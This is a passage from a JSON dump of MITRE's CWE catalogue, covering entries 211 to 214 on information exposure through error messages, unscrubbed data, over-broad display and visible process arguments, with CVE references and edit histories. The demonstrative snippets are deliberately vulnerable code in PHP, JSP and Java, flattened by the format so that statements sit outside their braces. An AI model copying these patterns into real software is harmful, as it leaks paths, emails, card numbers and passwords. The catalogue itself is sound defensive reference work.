$filename)){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"# avoid CWE-22, CWE-78, others.","xhtml:div":[{"#text":"ExitError(\\"Bad hacker!\\") ;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Error: $filename does not exist\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that is not associated with a configuration file, an attacker could get this pathname from the error message. It could then be used to exploit path traversal, symbolic link following, or other problems that may exist elsewhere in the application."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1745","Description":"Infoleak of sensitive information in error message (physical access required).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1745"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-Generated Error Message Infoleak"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 12: Information Leakage." Page 191"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Overly Verbose Error Messages", Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships, Time_of_Introduction"}],"Previous_Entry_Name":[{"#text":"Product-Generated Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Generated Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Self-generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"211":{"attr":{"@_ID":"211","@_Name":"Externally-Generated Error Message Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application performs an operation that triggers an external diagnostic or error message that is not directly generated or controlled by the application, such as an error generated by the programming language interpreter that the software uses. The error can contain sensitive system information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"PHP applications are often targeted for having this issue when the PHP interpreter generates the error outside of the application\'s control. However, other languages/environments exhibit the same issue."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Configure the application\'s environment in a way that prevents errors from being generated. For example, in PHP, disable display_errors."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Compilation or Build Hardening","Description":"Debugging information should not make its way into a production release."},{"attr":{"@_Mitigation_ID":"MIT-40"},"Phase":["Implementation","Build and Compilation"],"Strategy":"Environment Hardening","Description":"Debugging information should not make its way into a production release."},{"Phase":"Implementation","Description":"Handle exceptions internally and do not display errors containing potentially sensitive information to a user. Create default error pages if necessary."},{"Phase":"Implementation","Description":"The best way to prevent this weakness during implementation is to avoid any bugs that could trigger the external error message. This typically happens when the program encounters fatal errors, such as a divide-by-zero. You will not always be able to control the use of error pages, and you might not be using a language that handles exceptions."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1581","Description":"chain: product does not protect against direct request of an include file, leading to resultant path disclosure when the include file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1581"},{"Reference":"CVE-2004-1579","Description":"Single \\"\'\\" inserted into SQL query leads to invalid SQL query execution, triggering full path disclosure. Possibly resultant from more general SQL injection issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1579"},{"Reference":"CVE-2005-0459","Description":"chain: product does not protect against direct request of a library file, leading to resultant path disclosure when the file does not successfully execute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0459"},{"Reference":"CVE-2005-0443","Description":"invalid parameter triggers a failure to find an include file, leading to infoleak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0443"},{"Reference":"CVE-2005-0433","Description":"Various invalid requests lead to information leak in verbose error messages describing the failure to instantiate a class, open a configuration file, or execute an undefined function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0433"},{"Reference":"CVE-2004-1101","Description":"Improper handling of filename request with trailing \\"/\\" causes multiple consequences, including information leak in Visual Basic error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1101"}]},"Functional_Areas":{"Functional_Area":"Error Handling"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Product-External Error Message Infoleak"}},"Notes":{"Note":{"#text":"This is inherently a resultant vulnerability from a weakness within the product or an interaction error.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Functional_Areas, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Product-External Error Message Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through External Error Message","attr":{"@_Date":"2012-10-30"}},{"#text":"Information Exposure Through Externally-Generated Error Message","attr":{"@_Date":"2020-02-24"}}]}},"212":{"attr":{"@_ID":"212","@_Name":"Improper Removal of Sensitive Information Before Storage or Transfer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.","Extended_Description":{"xhtml:p":["Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing.","For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."},{"Phase":"Implementation","Description":"Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code either generates a public HTML user information page or a JSON response containing the same user information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$json = $_GET[\'json\']$username = $_GET[\'user\']if(!$json){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"// API flag, output JSON if set","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$record = getUserRecord($username);foreach($record as $fieldName => $fieldValue){}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if($fieldName == \\"email_address\\") {}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"continue;","xhtml:br":["",""],"xhtml:i":"// skip displaying user emails"}},{"#text":"writeToHtmlPage($fieldName,$fieldValue);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"#text":"$record = getUserRecord($username);echo json_encode($record);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},"Body_Text":"The programmer is careful to not display the user\'s e-mail address when displaying the public HTML page. However, the e-mail address is not removed from the JSON response, exposing the user\'s e-mail address."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0406","Description":"Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0406"},{"Reference":"CVE-2002-0704","Description":"NAT feature in firewall leaks internal IP addresses in ICMP error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0704"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-Boundary Cleansing Infoleak"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"168"}}},"Notes":{"Note":[{"#text":"This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked.","attr":{"@_Type":"Relationship"}},{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"The terms \\"cleansing\\" and \\"scrubbing\\" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Cross-boundary Cleansing Information Leak","attr":{"@_Date":"2009-12-28"}},{"#text":"Improper Cross-boundary Cleansing","attr":{"@_Date":"2010-02-16"}},{"#text":"Improper Cross-boundary Removal of Sensitive Data","attr":{"@_Date":"2020-02-24"}}]}},"213":{"attr":{"@_ID":"213","@_Name":"Exposure of Sensitive Information Due to Incompatible Policies","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s intended functionality exposes information to certain actors in accordance with the developer\'s security policy, but this information is regarded as sensitive according to the intended security policies of other stakeholders such as the product\'s administrator, users, or others whose information is being processed.","Extended_Description":{"xhtml:p":"When handling information, the developer must consider whether the information is regarded as sensitive by different stakeholders, such as users or administrators. Each stakeholder effectively has its own intended security policy that the product is expected to uphold. When a developer does not treat that information as sensitive, this can introduce a vulnerability that violates the expectations of the product\'s users."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Policy","Note":"This can occur when the product\'s policy does not account for all relevant stakeholders, or when the policies of other stakeholders are not interpreted properly."},{"Phase":"Requirements","Note":"This can occur when requirements do not explicitly account for all relevant stakeholders."},{"Phase":"Architecture and Design","Note":"Communications or data exchange frameworks may be chosen that exchange or provide access to more information than strictly needed."},{"Phase":"Implementation","Note":"This can occur when the developer does not properly track the flow of sensitive information and how it is exposed, e.g., via an API."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %>"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2004-0033","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033"},{"Reference":"CVE-2003-1181","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1181"},{"Reference":"CVE-2004-1422","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1422"},{"Reference":"CVE-2004-1590","Description":"Script calls phpinfo()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1590"},{"Reference":"CVE-2003-1038","Description":"Product lists DLLs and full pathnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1038"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2005-0488","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Intended information leak"}},"Notes":{"Note":[{"#text":"This entry is being considered for deprecation. It overlaps many other entries related to information exposures. It might not be essential to preserve this entry, since other key stakeholder policies are covered elsewhere, e.g. personal privacy leaks (CWE-359) and system-level exposures that are important to system administrators (CWE-497).","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this covers cases in which the developer\'s Intended Policy allows the information to be made available, but the information might be in violation of a Universal Policy in which the product\'s administrator should have control over which information is considered sensitive and therefore should not be exposed.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Other_Notes, Relationship_Notes, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Intended Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Intentional Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"214":{"attr":{"@_ID":"214","@_Name":"Invocation of Process Using Visible Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A process is invoked with sensitive command-line arguments, environment variables, or other elements that can be seen by other processes on the operating system.","Extended_Description":"Many operating systems allow a user to list information about processes that are owned by other users. Other users could see information such as command line arguments or environment variable settings. When this data contains sensitive information such as credentials, it might allow other users to launch an attack against the software or related resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, the password for a keystore file is read from a system property.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String keystorePass = System.getProperty(\\"javax.net.ssl.keyStorePassword\\");if (keystorePass == null) {}...","xhtml:br":["","",""],"xhtml:div":{"#text":"System.err.println(\\"ERROR: Keystore password not specified.\\");System.exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If the property is defined on the command line when the program is invoked (using the -D... syntax), the password may be displayed in the OS process list."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1387","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1387"},{"Reference":"CVE-2005-2291","Description":"password passed on command line","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2291"},{"Reference":"CVE-2001-1565","Description":"username/password on command line allows local users to view via \\"ps\\" or other process listing programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1565"},{"Reference":"CVE-2004-1948","Description":"Username/password on command line allows local users to view via \\"ps\\" or other process listing programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1948"},{"Reference":"CVE-1999-1270","Description":"PGP passphrase provided as command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1270"},{"Reference":"CVE-2004-1058","Description":"Kernel race condition allows reading of environment variables of a process that is still spawning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1058"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Process information infoleak to other processes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Under-studied, especially environment variables.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Process Information Leak to Other Processes","attr":{"@_Date":"2008-04-11"}},{"#text":"Process Environment Information Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Process Environment","attr":{"@_Date":"2020-02-24"}}]}},"215":{"attr":{"@_ID":"215","@_Name":"Insertion of Sensitive Information Into Debugging Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.","Extended_Description":"When debugging, it may be necessary to report detailed information to the programmer. However, if the debugging code is not disabled when the application is operating in a production environment, then this sensitive information may be exposed to 